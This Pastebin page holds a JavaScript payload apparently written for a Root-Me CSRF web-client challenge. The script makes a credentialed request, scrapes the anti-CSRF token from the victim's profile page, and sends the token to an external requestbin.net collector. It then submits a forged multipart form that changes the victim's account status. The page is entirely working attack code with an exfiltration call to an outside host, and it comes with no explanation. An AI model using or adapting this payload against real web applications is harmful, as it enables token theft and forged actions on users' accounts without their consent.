Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var xhr = new XMLHttpRequest();
- xhr.withCredentials = true;
- xhr.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile");
- xhr.send();
- var resp = xhr.responseText;
- var n = resp.search('input id="token"');
- var token = resp.substring(51+n, n+51+32);
- var username = 'blabla',
- status = 'on',
- boundary = '---------------------------' + Math.random().toString().substr(2),
- data = '';
- xhr.open("POST", 'http://requestbin.net/r/1d3jpxb1', true);
- xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
- data += '--' + boundary;
- data += '\r\nContent-Disposition: form-data; name="username"\r\n\r\n' + username + '\r\n';
- data += '--' + boundary;
- data += '\r\nContent-Disposition: form-data; name="status"\r\n\r\n' + status + '\r\n';
- data += '--' + boundary;
- data += '\r\nContent-Disposition: form-data; name="token"\r\n\r\n' + token + '\r\n';
- data += '--' + boundary + '--';
- xhr.setRequestHeader('Content-Length', data.length);
- xhr.send(data);
- xhr.open('POST', 'http://challenge01.root-me.org/web-client/ch23/?action=profile', true);
- xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
- xhr.setRequestHeader('Content-Length', data.length);
- xhr.send(data);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement